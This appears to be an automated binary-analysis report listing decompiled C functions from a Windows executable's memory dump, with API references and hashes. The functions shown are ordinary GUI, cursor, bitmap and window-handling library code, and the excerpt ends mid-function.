                                                                        • API String ID: 980243606-0
                                                                        • Opcode ID: bfb2f096e7f8a1596dd92f3a4f2661b09649afef723ca803cc1e0f0ba574a4f3
                                                                        • Instruction ID: 2b4ad22b928df6106159cc93f20210c2255a60c226f768308a27e69030d134a8
                                                                        • Opcode Fuzzy Hash: bfb2f096e7f8a1596dd92f3a4f2661b09649afef723ca803cc1e0f0ba574a4f3
                                                                        • Instruction Fuzzy Hash: 1B1154B1E042196BDB10EFE9DC41EAEB3FCEB09304F4145AAB514E7381D6789E508759
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E004546C4(long __eax, void* __ecx, short __edx) {
                                                                        				struct tagPOINT _v24;
                                                                        				long _t7;
                                                                        				long _t12;
                                                                        				long _t19;
                                                                        				void* _t21;
                                                                        				struct HWND__* _t27;
                                                                        				short _t28;
                                                                        				void* _t30;
                                                                        				struct tagPOINT* _t31;
                                                                        
                                                                        				_t21 = __ecx;
                                                                        				_t7 = __eax;
                                                                        				_t31 = _t30 + 0xfffffff8;
                                                                        				_t28 = __edx;
                                                                        				_t19 = __eax;
                                                                        				if(__edx ==  *((intOrPtr*)(__eax + 0x44))) {
                                                                        					L6:
                                                                        					 *((intOrPtr*)(_t19 + 0x48)) =  *((intOrPtr*)(_t19 + 0x48)) + 1;
                                                                        				} else {
                                                                        					 *((short*)(__eax + 0x44)) = __edx;
                                                                        					if(__edx != 0) {
                                                                        						L5:
                                                                        						_t7 = SetCursor(E0045469C(_t19, _t28));
                                                                        						goto L6;
                                                                        					} else {
                                                                        						GetCursorPos(_t31);
                                                                        						_push(_v24.y);
                                                                        						_t27 = WindowFromPoint(_v24);
                                                                        						if(_t27 == 0) {
                                                                        							goto L5;
                                                                        						} else {
                                                                        							_t12 = GetWindowThreadProcessId(_t27, 0);
                                                                        							if(_t12 != GetCurrentThreadId()) {
                                                                        								goto L5;
                                                                        							} else {
                                                                        								_t7 = SendMessageA(_t27, 0x20, _t27, E00407298(SendMessageA(_t27, 0x84, 0, E00407328(_t31, _t21)), 0x200));
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t7;
                                                                        			}













                                                                        APIs
                                                                        • GetCursorPos.USER32 ref: 004546DF
                                                                        • WindowFromPoint.USER32(?,?), ref: 004546EC
                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004546FA
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00454701
                                                                        • SendMessageA.USER32 ref: 0045471A
                                                                        • SendMessageA.USER32 ref: 00454731
                                                                        • SetCursor.USER32(00000000), ref: 00454743
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                        • String ID:
                                                                        • API String ID: 1770779139-0
                                                                        • Opcode ID: 3d56c9a08a5997f3f14bf83b8e0ff9a80a13e3b28eff73a018bfddd4205cad21
                                                                        • Instruction ID: a4fd025c39cd02020c09f08377d953acec842c109d22c87e699394f9229cea46
                                                                        • Opcode Fuzzy Hash: 3d56c9a08a5997f3f14bf83b8e0ff9a80a13e3b28eff73a018bfddd4205cad21
                                                                        • Instruction Fuzzy Hash: 2201B12664430025D62036764C86F7F25A88BDAB5AF11007FB904BE2C3EA3E9C45526E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 67%
                                                                        			E0040C430(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
                                                                        				char _v260;
                                                                        				char _v768;
                                                                        				char _v772;
                                                                        				short* _v776;
                                                                        				intOrPtr _v780;
                                                                        				char _v784;
                                                                        				signed int _v788;
                                                                        				signed short* _v792;
                                                                        				char _v796;
                                                                        				char _v800;
                                                                        				intOrPtr* _v804;
                                                                        				signed char _t44;
                                                                        				signed int _t49;
                                                                        				signed short* _t56;
                                                                        				char* _t58;
                                                                        				void* _t64;
                                                                        				intOrPtr* _t69;
                                                                        				signed short* _t76;
                                                                        				signed short* _t79;
                                                                        				intOrPtr _t88;
                                                                        				void* _t90;
                                                                        				void* _t92;
                                                                        				void* _t93;
                                                                        				void* _t94;
                                                                        				intOrPtr* _t102;
                                                                        				void* _t106;
                                                                        				intOrPtr _t107;
                                                                        				char* _t108;
                                                                        				void* _t109;
                                                                        
                                                                        				_v780 = __ecx;
                                                                        				_v776 = __eax;
                                                                        				_t44 =  *((intOrPtr*)(__edx));
                                                                        				_t97 = _t44 & 0x00000fff;
                                                                        				if((_t44 & 0x00000fff) != 0xc) {
                                                                        					_push(__edx);
                                                                        					_t88 = _v776;
                                                                        					_push(_t88);
                                                                        					L0040C12C();
                                                                        					return _t88;
                                                                        				}
                                                                        				if((_t44 & 0x00000040) == 0) {
                                                                        					_v792 =  *((intOrPtr*)(__edx + 8));
                                                                        				} else {
                                                                        					_v792 =  *((intOrPtr*)( *((intOrPtr*)(__edx + 8))));
                                                                        				}
                                                                        				_v788 =  *_v792 & 0x0000ffff;
                                                                        				_t90 = _v788 - 1;
                                                                        				if(_t90 >= 0) {
                                                                        					_t94 = _t90 + 1;
                                                                        					_t106 = 0;
                                                                        					_t108 =  &_v772;
                                                                        					do {
                                                                        						_v804 = _t108;
                                                                        						_push(_v804 + 4);
                                                                        						_t16 = _t106 + 1; // 0x1
                                                                        						_t76 = _v792;
                                                                        						_push(_t76);
                                                                        						L0040C154();
                                                                        						if(_t76 != 0) {
                                                                        							E004028B0(0x14);
                                                                        						}
                                                                        						_push( &_v784);
                                                                        						_t19 = _t106 + 1; // 0x1
                                                                        						_t79 = _v792;
                                                                        						_push(_t79);
                                                                        						L0040C15C();
                                                                        						if(_t79 != 0) {
                                                                        							E004028B0(0x14);
                                                                        						}
                                                                        						 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
                                                                        						_t106 = _t106 + 1;
                                                                        						_t108 = _t108 + 8;
                                                                        						_t94 = _t94 - 1;
                                                                        					} while (_t94 != 0);
                                                                        				}
                                                                        				_push( &_v772);
                                                                        				_t49 = _v788;
                                                                        				_push(_t49);
                                                                        				_push(0xc);
                                                                        				L0040C144();
                                                                        				_t107 = _t49;
                                                                        				if(_t107 == 0) {
                                                                        					E004028B0(0x12);
                                                                        				}
                                                                        				E0040C2F0(_v776, _t97);
                                                                        				 *_v776 = 0x200c;
                                                                        				 *((intOrPtr*)(_v776 + 8)) = _t107;
                                                                        				_t92 = _v788 - 1;
                                                                        				if(_t92 >= 0) {
                                                                        					_t93 = _t92 + 1;
                                                                        					_t69 =  &_v768;
                                                                        					_t102 =  &_v260;
                                                                        					do {
                                                                        						 *_t102 =  *_t69;
                                                                        						_t102 = _t102 + 4;
                                                                        						_t69 = _t69 + 8;
                                                                        						_t93 = _t93 - 1;
                                                                        					} while (_t93 != 0);
                                                                        					do {
                                                                        						goto L17;
                                                                        					} while (_t64 != 0);
                                                                        					return _t64;
                                                                        				}
                                                                        				L17:
                                                                        				_push( &_v796);
                                                                        				_push( &_v260);
                                                                        				_t56 = _v792;
                                                                        				_push(_t56);
                                                                        				L0040C174();
                                                                        				if(_t56 != 0) {
                                                                        					E004028B0(0x14);
                                                                        				}
                                                                        				_push( &_v800);
                                                                        				_t58 =  &_v260;
                                                                        				_push(_t58);
                                                                        				_push(_t107);
                                                                        				L0040C174();
                                                                        				if(_t58 != 0) {
                                                                        					E004028B0(0x14);
                                                                        				}
                                                                        				_v780();
                                                                        				_t64 = E0040C3D4(_v788 - 1, _t109);
                                                                        			}

































                                                                        APIs
                                                                        • VariantCopy.OLEAUT32(?), ref: 0040C460
                                                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040C4C5
                                                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040C4E7
                                                                        • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040C526
                                                                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040C591
                                                                        • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040C5B0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                        • String ID:
                                                                        • API String ID: 351091851-0
                                                                        • Opcode ID: bde47607384e88626c11003b3b21496450f61ba110f915f81c0edd029a5ca511
                                                                        • Instruction ID: 91eb53b407ec2d2dd2796e8a100e52e0f4196e31d9e17e27235ea4b964657383
                                                                        • Opcode Fuzzy Hash: bde47607384e88626c11003b3b21496450f61ba110f915f81c0edd029a5ca511
                                                                        • Instruction Fuzzy Hash: 7851EF75901529DBDB22DB59CD90ADAB3BCBF48304F0042FAE509E7352D674AF818F64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 68%
                                                                        			E00421568(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, int _a4, signed int* _a8) {
                                                                        				intOrPtr* _v8;
                                                                        				intOrPtr _v12;
                                                                        				signed int _v16;
                                                                        				intOrPtr _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v32;
                                                                        				signed short _v44;
                                                                        				int _t36;
                                                                        				signed int _t37;
                                                                        				signed short _t38;
                                                                        				signed int _t39;
                                                                        				signed short _t43;
                                                                        				signed int* _t47;
                                                                        				signed int _t51;
                                                                        				intOrPtr _t61;
                                                                        				void* _t67;
                                                                        				void* _t68;
                                                                        				void* _t69;
                                                                        				intOrPtr _t70;
                                                                        
                                                                        				_t68 = _t69;
                                                                        				_t70 = _t69 + 0xffffff90;
                                                                        				_v16 = __ecx;
                                                                        				_v12 = __edx;
                                                                        				_v8 = __eax;
                                                                        				_t47 = _a8;
                                                                        				_v24 = _v16 << 4;
                                                                        				_v20 = E004083E8(_v24, __eflags);
                                                                        				 *[fs:edx] = _t70;
                                                                        				_t51 = _v24;
                                                                        				 *((intOrPtr*)( *_v8 + 8))( *[fs:edx], 0x42185f, _t68, __edi, __esi, __ebx, _t67);
                                                                        				if(( *_t47 | _t47[1]) != 0) {
                                                                        					_t36 = _a4;
                                                                        					 *_t36 =  *_t47;
                                                                        					 *(_t36 + 4) = _t47[1];
                                                                        				} else {
                                                                        					 *_a4 = GetSystemMetrics(0xb);
                                                                        					_t36 = GetSystemMetrics(0xc);
                                                                        					 *(_a4 + 4) = _t36;
                                                                        				}
                                                                        				_push(0);
                                                                        				L00406EB4();
                                                                        				_v44 = _t36;
                                                                        				if(_v44 == 0) {
                                                                        					E00420A2C(_t51);
                                                                        				}
                                                                        				_push(_t68);
                                                                        				_push(0x421651);
                                                                        				_push( *[fs:edx]);
                                                                        				 *[fs:edx] = _t70;
                                                                        				_push(0xe);
                                                                        				_t37 = _v44;
                                                                        				_push(_t37);
                                                                        				L00406B8C();
                                                                        				_push(0xc);
                                                                        				_t38 = _v44;
                                                                        				_push(_t38);
                                                                        				L00406B8C();
                                                                        				_t39 = _t37 * _t38;
                                                                        				if(_t39 <= 8) {
                                                                        					__eflags = 1;
                                                                        					_v32 = 1 << _t39;
                                                                        				} else {
                                                                        					_v32 = 0x7fffffff;
                                                                        				}
                                                                        				_pop(_t61);
                                                                        				 *[fs:eax] = _t61;
                                                                        				_push(E00421658);
                                                                        				_t43 = _v44;
                                                                        				_push(_t43);
                                                                        				_push(0);
                                                                        				L00407124();
                                                                        				return _t43;
                                                                        			}























                                                                        APIs
                                                                        • GetSystemMetrics.USER32 ref: 004215B6
                                                                        • GetSystemMetrics.USER32 ref: 004215C2
                                                                        • 72E7AC50.USER32(00000000), ref: 004215DE
                                                                        • 72E7AD70.GDI32(00000000,0000000E,00000000,00421651,?,00000000), ref: 00421605
                                                                        • 72E7AD70.GDI32(00000000,0000000C,00000000,0000000E,00000000,00421651,?,00000000), ref: 00421612
                                                                        • 72E7B380.USER32(00000000,00000000,00421658,0000000E,00000000,00421651,?,00000000), ref: 0042164B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: MetricsSystem$B380
                                                                        • String ID:
                                                                        • API String ID: 3145338429-0
                                                                        • Opcode ID: d1eb4b26aebf92080a74f6cc0787259d8db2efac78c55e80a3cbf10a8e3eebe9
                                                                        • Instruction ID: 1df3673ef4671481c0cb97d4e5fb4c97dc3887fd9bb6d5ee2f2f7d792188f36b
                                                                        • Opcode Fuzzy Hash: d1eb4b26aebf92080a74f6cc0787259d8db2efac78c55e80a3cbf10a8e3eebe9
                                                                        • Instruction Fuzzy Hash: F2317374B00218EFDB00DF65C881AAEBBF5FB89710F50816AF915AB395C6389D41CB69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 45%
                                                                        			E004219D8(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
                                                                        				char _v5;
                                                                        				struct HDC__* _v12;
                                                                        				struct HDC__* _v16;
                                                                        				struct HDC__* _t29;
                                                                        				struct tagBITMAPINFO* _t32;
                                                                        				intOrPtr _t39;
                                                                        				struct HBITMAP__* _t43;
                                                                        				void* _t46;
                                                                        
                                                                        				_t32 = __ecx;
                                                                        				_t43 = __eax;
                                                                        				E00421888(__eax, _a4, __ecx);
                                                                        				_v12 = 0;
                                                                        				_push(0);
                                                                        				L00406AE4();
                                                                        				_v16 = 0;
                                                                        				_push(_t46);
                                                                        				_push(0x421a75);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t46 + 0xfffffff4;
                                                                        				if(__edx != 0) {
                                                                        					_push(0);
                                                                        					_push(__edx);
                                                                        					_t29 = _v16;
                                                                        					_push(_t29);
                                                                        					L00406C5C();
                                                                        					_v12 = _t29;
                                                                        					_push(_v16);
                                                                        					L00406C2C();
                                                                        				}
                                                                        				_v5 = GetDIBits(_v16, _t43, 0, _t32->bmiHeader.biHeight, _a8, _t32, 0) != 0;
                                                                        				_pop(_t39);
                                                                        				 *[fs:eax] = _t39;
                                                                        				_push(E00421A7C);
                                                                        				if(_v12 != 0) {
                                                                        					_push(0);
                                                                        					_push(_v12);
                                                                        					_push(_v16);
                                                                        					L00406C5C();
                                                                        				}
                                                                        				return DeleteDC(_v16);
                                                                        			}












                                                                        APIs
                                                                          • Part of subcall function 00421888: GetObjectA.GDI32(?,00000054), ref: 0042189C
                                                                        • 72E7A590.GDI32(00000000), ref: 004219FA
                                                                        • 72E7B410.GDI32(?,?,00000000,00000000,00421A75,?,00000000), ref: 00421A1B
                                                                        • 72E7B150.GDI32(?,?,?,00000000,00000000,00421A75,?,00000000), ref: 00421A27
                                                                        • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 00421A3E
                                                                        • 72E7B410.GDI32(?,00000000,00000000,00421A7C,00000000,?,?,?,00000000,00000000,00421A75,?,00000000), ref: 00421A66
                                                                        • DeleteDC.GDI32(?), ref: 00421A6F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: B410$A590B150BitsDeleteObject
                                                                        • String ID:
                                                                        • API String ID: 3837315262-0
                                                                        • Opcode ID: e98d72b155561e039d069f85c1537096a3a31416e4cc9bde9117b13ecef65495
                                                                        • Instruction ID: 8d8527e8f488405aff4f669bab89b73bcf596afed52ccf13c67bd5abc98d74bf
                                                                        • Opcode Fuzzy Hash: e98d72b155561e039d069f85c1537096a3a31416e4cc9bde9117b13ecef65495
                                                                        • Instruction Fuzzy Hash: 7B118275B042147FDB10EBA9CC41F5EBBFCEB4C700F51846AB918E7291D6789900C768
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004333D8(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                        				char _v8;
                                                                        				void* _t20;
                                                                        				void* _t21;
                                                                        				void* _t27;
                                                                        				void* _t31;
                                                                        				void* _t35;
                                                                        				intOrPtr* _t43;
                                                                        
                                                                        				_t43 =  &_v8;
                                                                        				_t20 =  *0x47a8ac; // 0x0
                                                                        				 *((intOrPtr*)(_t20 + 0x180)) = _a4;
                                                                        				_t21 =  *0x47a8ac; // 0x0
                                                                        				SetWindowLongA(_a4, 0xfffffffc,  *(_t21 + 0x18c));
                                                                        				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
                                                                        					SetWindowLongA(_a4, 0xfffffff4, _a4);
                                                                        				}
                                                                        				_t27 =  *0x47a8ac; // 0x0
                                                                        				SetPropA(_a4,  *0x496b7a & 0x0000ffff, _t27);
                                                                        				_t31 =  *0x47a8ac; // 0x0
                                                                        				SetPropA(_a4,  *0x496b78 & 0x0000ffff, _t31);
                                                                        				_t35 =  *0x47a8ac; // 0x0
                                                                        				 *0x47a8ac = 0;
                                                                        				_v8 =  *((intOrPtr*)(_t35 + 0x18c))(_a4, _a8, _a12, _a16);
                                                                        				return  *_t43;
                                                                        			}











                                                                        APIs
                                                                        • SetWindowLongA.USER32 ref: 00433400
                                                                        • GetWindowLongA.USER32 ref: 0043340B
                                                                        • GetWindowLongA.USER32 ref: 0043341D
                                                                        • SetWindowLongA.USER32 ref: 00433430
                                                                        • SetPropA.USER32(?,00000000,00000000), ref: 00433447
                                                                        • SetPropA.USER32(?,00000000,00000000), ref: 0043345E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: LongWindow$Prop
                                                                        • String ID:
                                                                        • API String ID: 3887896539-0
                                                                        • Opcode ID: a2b974559dbee0a756eb0a72755d0049ae3fa082466c9d19223a96232c7cdb99
                                                                        • Instruction ID: 2f816502963edffd2a2e0b87a7de9d57cd36cbe0b36d5e0b22d0fd463ea8592c
                                                                        • Opcode Fuzzy Hash: a2b974559dbee0a756eb0a72755d0049ae3fa082466c9d19223a96232c7cdb99
                                                                        • Instruction Fuzzy Hash: EF112CB5504104BFDB10EF9DDC84E9A37E8AF08320F118222B918CB3A1D738E9508B69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 87%
                                                                        			E00421218(struct HDC__* __eax, signed int __ecx) {
                                                                        				char _v1036;
                                                                        				signed int _v1038;
                                                                        				struct tagRGBQUAD _v1048;
                                                                        				short _v1066;
                                                                        				short* _t15;
                                                                        				void* _t18;
                                                                        				struct HDC__* _t23;
                                                                        				void* _t26;
                                                                        				short* _t31;
                                                                        				short* _t32;
                                                                        
                                                                        				_t31 = 0;
                                                                        				 *_t32 = 0x300;
                                                                        				if(__eax == 0) {
                                                                        					_v1038 = __ecx;
                                                                        					E004029BC(_t26, __ecx << 2,  &_v1036);
                                                                        				} else {
                                                                        					_push(0);
                                                                        					L00406AE4();
                                                                        					_t23 = __eax;
                                                                        					_t18 = SelectObject(__eax, __eax);
                                                                        					_v1066 = GetDIBColorTable(_t23, 0, 0x100,  &_v1048);
                                                                        					SelectObject(_t23, _t18);
                                                                        					DeleteDC(_t23);
                                                                        				}
                                                                        				if(_v1038 != 0) {
                                                                        					if(_v1038 != 0x10 || E00421180(_t32) == 0) {
                                                                        						E00421010( &_v1036, _v1038 & 0x0000ffff);
                                                                        					}
                                                                        					_t15 = _t32;
                                                                        					_push(_t15);
                                                                        					L00406B0C();
                                                                        					_t31 = _t15;
                                                                        				}
                                                                        				return _t31;
                                                                        			}














                                                                        APIs
                                                                        • 72E7A590.GDI32(00000000,00000000,?,?,00424C7F,?,?,?,?,0042378B,00000000,00423817), ref: 00421231
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0042123A
                                                                        • GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,00424C7F,?,?,?,?,0042378B), ref: 0042124E
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0042125A
                                                                        • DeleteDC.GDI32(00000000), ref: 00421260
                                                                        • 72E7A8F0.GDI32(?,00000000,?,?,00424C7F,?,?,?,?,0042378B,00000000,00423817), ref: 004212A6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: ObjectSelect$A590ColorDeleteTable
                                                                        • String ID:
                                                                        • API String ID: 1056449717-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0045BE40(void* __eax) {
                                                                        				struct tagRECT _v20;
                                                                        				struct HWND__* _t18;
                                                                        				void* _t29;
                                                                        				RECT* _t30;
                                                                        
                                                                        				_t29 = __eax;
                                                                        				ValidateRect(E0043CC2C(__eax), 0);
                                                                        				InvalidateRect(E0043CC2C(_t29), 0, 0xffffffff);
                                                                        				GetClientRect(E0043CC2C(_t29), _t30);
                                                                        				_t18 = E0043CC2C( *((intOrPtr*)(_t29 + 0x240)));
                                                                        				MapWindowPoints(E0043CC2C(_t29), _t18,  &_v20, 2);
                                                                        				ValidateRect(E0043CC2C( *((intOrPtr*)(_t29 + 0x240))), _t30);
                                                                        				return InvalidateRect(E0043CC2C( *((intOrPtr*)(_t29 + 0x240))),  &_v20, 0);
                                                                        			}








                                                                        APIs
                                                                        • ValidateRect.USER32(00000000,00000000,0045C694), ref: 0045BE50
                                                                        • InvalidateRect.USER32(00000000,00000000,000000FF,00000000,00000000,0045C694), ref: 0045BE61
                                                                        • GetClientRect.USER32 ref: 0045BE6F
                                                                        • MapWindowPoints.USER32 ref: 0045BE8F
                                                                        • ValidateRect.USER32(00000000,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000,000000FF,00000000,00000000,0045C694), ref: 0045BEA1
                                                                        • InvalidateRect.USER32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000,000000FF,00000000,00000000), ref: 0045BEB9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: Rect$InvalidateValidate$ClientPointsWindow
                                                                        • String ID:
                                                                        • API String ID: 2846033224-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004208FC(void* __eax) {
                                                                        				void* _t36;
                                                                        
                                                                        				_t36 = __eax;
                                                                        				UnrealizeObject(E0041FC84( *((intOrPtr*)(__eax + 0x14))));
                                                                        				SelectObject( *(_t36 + 4), E0041FC84( *((intOrPtr*)(_t36 + 0x14))));
                                                                        				if(E0041FD64( *((intOrPtr*)(_t36 + 0x14))) != 0) {
                                                                        					SetBkColor( *(_t36 + 4),  !(E0041EFA4(E0041FC48( *((intOrPtr*)(_t36 + 0x14))))));
                                                                        					return SetBkMode( *(_t36 + 4), 1);
                                                                        				} else {
                                                                        					SetBkColor( *(_t36 + 4), E0041EFA4(E0041FC48( *((intOrPtr*)(_t36 + 0x14)))));
                                                                        					return SetBkMode( *(_t36 + 4), 2);
                                                                        				}
                                                                        			}





                                                                        APIs
                                                                          • Part of subcall function 0041FC84: CreateBrushIndirect.GDI32(?), ref: 0041FD2E
                                                                        • UnrealizeObject.GDI32(00000000), ref: 00420908
                                                                        • SelectObject.GDI32(?,00000000), ref: 0042091A
                                                                        • SetBkColor.GDI32(?,00000000), ref: 0042093D
                                                                        • SetBkMode.GDI32(?,00000002), ref: 00420948
                                                                        • SetBkColor.GDI32(?,00000000), ref: 00420963
                                                                        • SetBkMode.GDI32(?,00000001), ref: 0042096E
                                                                          • Part of subcall function 0041EFA4: GetSysColor.USER32(?), ref: 0041EFAE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                        • String ID:
                                                                        • API String ID: 3527656728-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 88%
                                                                        			E00471C3C(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                        				char _v8;
                                                                        				char _v12;
                                                                        				intOrPtr _v16;
                                                                        				char _v20;
                                                                        				char _v24;
                                                                        				char _v28;
                                                                        				void* _t46;
                                                                        				int _t56;
                                                                        				void* _t68;
                                                                        				void* _t71;
                                                                        				void* _t85;
                                                                        				intOrPtr _t89;
                                                                        				intOrPtr _t91;
                                                                        				intOrPtr _t92;
                                                                        				intOrPtr _t93;
                                                                        				intOrPtr _t94;
                                                                        				intOrPtr _t97;
                                                                        				intOrPtr _t102;
                                                                        				void* _t108;
                                                                        				intOrPtr _t110;
                                                                        				void* _t113;
                                                                        
                                                                        				_v28 = 0;
                                                                        				_t110 = __edx;
                                                                        				_t85 = __eax;
                                                                        				_push(_t113);
                                                                        				_push(0x471e1a);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t113 + 0xffffffe8;
                                                                        				if(__edx == 0) {
                                                                        					L8:
                                                                        					if( *((intOrPtr*)(_t85 + 0x20c)) == 0) {
                                                                        						L12:
                                                                        						if(_t110 != 0 &&  *((intOrPtr*)(_t110 + 0x30)) ==  *((intOrPtr*)(_t85 + 0x30))) {
                                                                        							_t92 =  *0x46af2c; // 0x46af78
                                                                        							if(E00403768(_t110, _t92) == 0) {
                                                                        								_t93 =  *0x46ab14; // 0x46ab60
                                                                        								if(E00403768(_t110, _t93) == 0) {
                                                                        									_t94 =  *0x46c2d8; // 0x46c324
                                                                        									if(E00403768(_t110, _t94) == 0 && E00471C0C(E00403524(_t110), "TDBEdit") == 0 && E00471C0C(E00403524(_t110), "TDBMemo") == 0) {
                                                                        										_t46 = E0043CF30(_t85);
                                                                        										_t132 = _t46;
                                                                        										if(_t46 != 0) {
                                                                        											E00471E48(_t85, _t110, _t132);
                                                                        											_t56 = E0043CC2C(_t110);
                                                                        											SendMessageA(E0043CC2C(_t85), 0x469, _t56, 0);
                                                                        										}
                                                                        										 *((intOrPtr*)(_t85 + 0x20c)) = _t110;
                                                                        										_t97 =  *0x429ec4; // 0x429f10
                                                                        										if(E00403768(_t110, _t97) != 0) {
                                                                        											E00408720( *((short*)(_t85 + 0x21c)),  &_v28);
                                                                        											E004365DC(_t110, _t85, _v28, _t110);
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						_pop(_t91);
                                                                        						 *[fs:eax] = _t91;
                                                                        						_push(0x471e21);
                                                                        						return E00404348( &_v28);
                                                                        					}
                                                                        					if(E0043CF30(_t85) != 0) {
                                                                        						SendMessageA(E0043CC2C(_t85), 0x469, 0, 0);
